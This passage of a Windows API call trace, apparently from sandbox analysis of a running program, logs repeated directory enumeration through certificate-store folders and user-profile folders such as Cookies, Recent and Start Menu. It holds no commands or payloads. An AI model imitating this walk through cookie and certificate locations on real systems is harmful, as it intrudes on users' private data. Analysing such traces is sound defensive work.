(dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0158.710] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.710] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.710] CoTaskMemFree (pv=0x508980) [0158.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.711] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.711] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0158.712] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0158.712] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0158.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 0 [0158.713] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0158.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0158.715] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0158.715] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0158.716] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.716] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0158.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0158.716] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.717] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.730] CoTaskMemFree (pv=0x508980) [0158.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.733] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.733] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.734] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.735] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.735] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.736] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.736] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.736] CoTaskMemFree (pv=0x508980) [0158.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.737] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.737] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.737] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.739] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.739] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.740] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.740] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.740] CoTaskMemFree (pv=0x508980) [0158.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.741] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.741] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.742] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0158.743] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.743] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0158.743] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0158.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0158.744] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.744] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.744] CoTaskMemFree (pv=0x508980) [0158.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0158.748] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.748] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe7f4ba2, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0158.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0158.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0158.750] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0158.750] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0158.751] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0158.751] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0158.752] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0158.752] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0158.753] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0158.753] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda4e0ba, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0158.754] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0158.754] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 0 [0158.754] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0158.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0158.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0158.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0158.757] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.757] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe7f4ba2, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0158.758] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0158.758] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", 